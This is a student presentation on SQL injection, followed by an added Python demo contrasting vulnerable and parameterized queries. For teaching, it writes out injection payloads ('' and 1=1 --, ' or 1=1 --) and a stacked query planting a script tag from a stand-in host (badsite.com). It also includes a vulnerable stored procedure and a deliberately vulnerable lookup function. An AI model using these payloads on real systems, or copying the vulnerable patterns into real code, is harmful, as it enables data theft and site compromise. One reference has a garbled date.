SQL Injection
SQLi Presentation for IT 6873 (Fall 2014)
Aaron Hill, IT 6873, Southern Polytechnic State University
What is it?
- A technique where individuals insert or append commands or code into a statement, altering the intent and actions of the resulting query
- Allows hackers to view, delete, or change data in a compromising way
Basic Examples
- Utilizing a statement that is always true
- Entering a value into a field that will render a statement condition as always true (1=1 or ""="")
  SELECT field_name from table_name where username = '' and 1=1 --'
- Appending another command through a terminating character (such as ;)
Types of Vulnerabilities
- Incorrect type handling
- Database server
- Blind injection: conditional responses, conditional errors, time delays
Combinations
- SQL injection can be used in conjunction with XSS, malware, JavaScript, etc.
- In 2008, over 1 million websites were compromised due to hybridized SQL injection attacks utilizing other components
Places of Concern
- SQL code
- HTML tags
- Stored procedures

HTML Tags
SELECT FIRST_NAME, LAST_NAME FROM CUSTOMER WHERE USERNAME = ''; UPDATE CUSTOMER SET MIDDLE_NAME = '<script src=http://badsite.com>'; --'
Stored Procedures
CREATE PROCEDURE getOrdersByCustomerID @custId nvarchar(50) AS
    -- Dynamic SQL built by string concatenation: the parameter value is spliced into the statement text
    EXECUTE('SELECT OrderID FROM Sales WHERE CustomerID = ''' + @custId + '''');
Difficulties
- Obvious attacks: structure deletion, denial of service, increased load on the system
- Covert attacks: changes to data, changes to code
Real World: Asprox
- Executable installed via phishing emails or through the network
- Searches Google for vulnerable ASP sites
- Downloads compromising JavaScript from direct84.com
- Attempts to download additional harmful JavaScript, Asprox copies, Trojan Danmec, and/or an SQL attack tool
Real World: Sony
- Hacked by LulzSec
- Attack on several of Sony's ventures, such as SonyPictures.com and music division servers
- LulzSec claimed the attack resulted from a single statement
- Purportedly, injection may have been involved in the PSN attack
Real World: Sun & MySQL
- TinKode and Ne0h compromised specific Sun domains
- Obtained column names and email addresses in a table
- MySQL.com: exposed metadata, account names, and passwords (both admin and blog)
- Issue with the web coding, not the database
Real World: CyberVors
- Russian cyber criminal group
- Compromised 400,000+ servers and sites
- Approx. 1.2 billion usernames and passwords stolen
- Indiscriminate targeting of companies
- Utilized different hacking methods and several individuals and groups over several years
Preventative Measures
- Blacklisted words or characters: not recommended
- Utilizing SQL parameters
- Validation controls and field classification
- Disallow error messages from revealing database metadata
- Johnny's Google Hacking Database: Johnny.ihackstuff.com/ghdb
Validation Samples
// Reject input containing a single quote before it reaches the query
if (UserID.Contains("'")) {
    // redirect to an error page
} else {
    // perform query action here
}

Validation Samples
// Convert the input to the expected type; anything that fails the conversion is rejected
try {
    // convert input to value of specified type
} catch {
    // redirect to error page
}

Validation Samples
// Pass the value as a parameter rather than concatenating it into the statement
string ID;
database.querytext = "SELECT ID FROM TABLENAME WHERE USERID = ?";
database.addParameter(ID);
database.executeQuery();
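The following is an added example, not code from the presentation: it carries the "Basic Examples" slide and the three validation samples through in Python against an in-memory SQLite database, so the effect of concatenation versus parameters can be observed directly. The users table, its rows, and the function names are assumptions constructed for this example.

```python
import sqlite3

# Constructed sample data; the table and rows are assumptions for this example.
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]


def make_db():
    """Build an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """The pattern the slides warn about: user input spliced into the statement text.
    Kept deliberately vulnerable so the effect of an always-true condition is visible."""
    sql = "SELECT username FROM users WHERE username = '" + username + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    """The 'Utilizing SQL Parameters' measure: the value travels separately from the
    statement, so the database engine never parses it as SQL."""
    sql = "SELECT username FROM users WHERE username = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username,))]


def lookup_by_id_validated(conn, raw_id):
    """The 'convert input to value of specified type' sample: a user id must be an
    integer, so anything that fails the conversion is rejected before any query runs.
    Returns None where the slides would redirect to an error page."""
    try:
        user_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchall()
    return rows[0][0] if rows else None


def safe_lookup(conn, username, lookup=lookup_parameterized):
    """Wrap a lookup so database errors never reach the caller: the generic message
    stands in for 'disallow error messages from revealing database metadata'.
    Production code would log the exception server-side instead of discarding it."""
    try:
        return lookup(conn, username)
    except sqlite3.Error:
        return "lookup failed"


if __name__ == "__main__":
    db = make_db()
    # The always-true condition from the 'Basic Examples' slide.
    payload = "' or 1=1 --"
    print("vulnerable:", lookup_vulnerable(db, payload))        # every row comes back
    print("parameterized:", lookup_parameterized(db, payload))  # no such user: []
    print("validated id:", lookup_by_id_validated(db, "2"))
    print("validated id (rejected):", lookup_by_id_validated(db, "2 or 1=1"))
    print("generic error:", safe_lookup(db, "'", lookup_vulnerable))
```

The concatenated version returns all three rows for the always-true input because the `--` turns the trailing quote into a comment; the parameterized version returns nothing because the same characters are compared as a literal username. The type-conversion check refuses non-integer ids before any statement is built, and the wrapper shows that a malformed input reaching the vulnerable path produces a database error which should be replaced by a generic message rather than shown to the user.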
Follow-up Questions
- What tools or techniques can be used to determine vulnerabilities within a system for SQLi?
- Have you had to reassess code to prevent SQLi vulnerabilities? If so, please elaborate.
- What are some other modern cases involving SQLi?
References & Readings
Arthur, C. (2014). LulzSec hacker arrested over Sony attack. Retrieved from http://www.theguardian.com/technology/2012/aug/29/lulzsec-hacker-arrest-sony-attack
Databases vulnerable to SQL injections. (2008). Data Strategy, 3(12), 6.
Dorai, R., & Kannan, V. (2011). SQL Injection-Database Attack Revolution and Prevention. Journal of International Commercial Law & Technology, 6(4), 224-231.
International Business, T. (0006, July). Post-PSN hack: Sony apologise at E3 as LulzSec mount fresh attack. International Business Times.
Kirk, J. (2013). Asprox botnet proves to be a resilient foe. Cio (13284045), 8.
Lemos, R. (2014). Russian Cyber-Gang Gathers 1.2B Login Credentials Via Website Flaws. Eweek, 7.
OWASP. (2014). SQL Injection. Retrieved from https://www.owasp.org/index.php/SQL_Injection
Prince, B. (2008). Botnet installs SQL injection tool. Eweek, 25(16), 21.
Sullivan, B., & Liu, V. (2012). Web Application Security: A Beginner's Guide. New York, NY: McGraw-Hill Companies.
Sun.com, MySQL.com Hacked, SQL Injection Attack. (2011). Channel Insider, 1.
W3Schools. (2014). SQL injection. Retrieved from http://www.w3schools.com/sql/sql_injection.asp